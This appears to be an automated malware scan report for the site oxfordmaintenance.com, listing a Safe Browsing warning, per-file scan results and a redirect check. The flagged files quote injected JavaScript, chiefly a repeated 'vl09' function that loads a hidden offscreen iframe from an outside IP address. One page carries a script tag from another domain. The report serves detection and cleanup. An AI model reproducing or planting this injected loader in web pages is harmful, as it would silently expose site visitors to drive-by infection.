Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oxfordmaintenance.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.oxfordmaintenance.com/ | 200 OK Content-Length: 7508 Content-Type: text/html | clean |
http://www.oxfordmaintenance.com/index.html | 200 OK Content-Length: 7508 Content-Type: text/html | clean |
http://www.oxfordmaintenance.com/images.html | 200 OK Content-Length: 16349 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://easttexasautoglass.com/jrh7vmwr.php?id=3256886"></script> | ||
http://www.oxfordmaintenance.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 9590 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 79.96.173.60 ...[2748 bytes skipped]... ype) ret.embedAttrs["type"] = mimeType; return ret; } function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... | ||
http://www.oxfordmaintenance.com/js/prototype.js | 200 OK Content-Length: 127840 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2694 bytes skipped]... nt.ClassNames.prototype, Enumerable); Element.addMethods(); function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Antivirus reports:
| ||
http://www.oxfordmaintenance.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 4362 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1350 bytes skipped]... +'.js') }); }); } } Scriptaculous.load(); function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Antivirus reports:
| ||
http://www.oxfordmaintenance.com/js/lightbox.js | 200 OK Content-Length: 19951 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2616 bytes skipped]... ocument.observe('dom:loaded', function () { new Lightbox(); }); function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Antivirus reports:
| ||
http://www.oxfordmaintenance.com/sound.html | 200 OK Content-Length: 11931 Content-Type: text/html | clean |
http://www.oxfordmaintenance.com/video-java.html | 200 OK Content-Length: 11787 Content-Type: text/html | clean |
http://www.oxfordmaintenance.com/js/jquery.tools.min.js | 200 OK Content-Length: 76254 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2454 bytes skipped]... ),f);b(this).data("expose",e)});return f.api?e:this}})(jQuery); function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[707 bytes skipped]... Antivirus reports:
| ||
http://www.oxfordmaintenance.com/js/swfobject.js | 200 OK Content-Length: 11321 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 79.96.173.60 ...[2502 bytes skipped]... p;h.win){M.style.display="block"}}M=null;l=null;A=false}}}}}(); function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Decoded script: function E() { if (e) { return; } if (h.ie && h.win) { var v = a("span"); try { var u = K.getElementsByTagName("body")[0].appendChild(v); u.parentNode.removeChild(u); } catch (w) { return; } } e = true; if (Z) { clearInterval(Z); Z = null; } var q = o.length; for (var r = 0; r < q; r++) { o[r](); } } | ||
http://www.oxfordmaintenance.com/js/videogallery.js | 200 OK Content-Length: 3641 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1613 bytes skipped]... llowS`)G!Access:\"always\", ` 7!FullScreen`/I!}, `-f-}});});")) function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Antivirus reports:
| ||
http://www.oxfordmaintenance.com/about.html | 200 OK Content-Length: 8161 Content-Type: text/html | clean |
http://www.oxfordmaintenance.com/Ten to the minus twenty-v4.pdf | 200 OK Content-Length: 300970 Content-Type: application/pdf | clean |
http://www.oxfordmaintenance.com/test404page.js | 404 Not Found Content-Length: 5823 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oxfordmaintenance.com
Result:
GET / HTTP/1.1
Host: oxfordmaintenance.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: oxfordmaintenance.com
Referer: http://www.google.com/search?q=oxfordmaintenance.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oxfordmaintenance.com
Referer: http://www.google.com/search?q=oxfordmaintenance.com
Result:
The result is similar to the first query. There are no suspicious redirects found.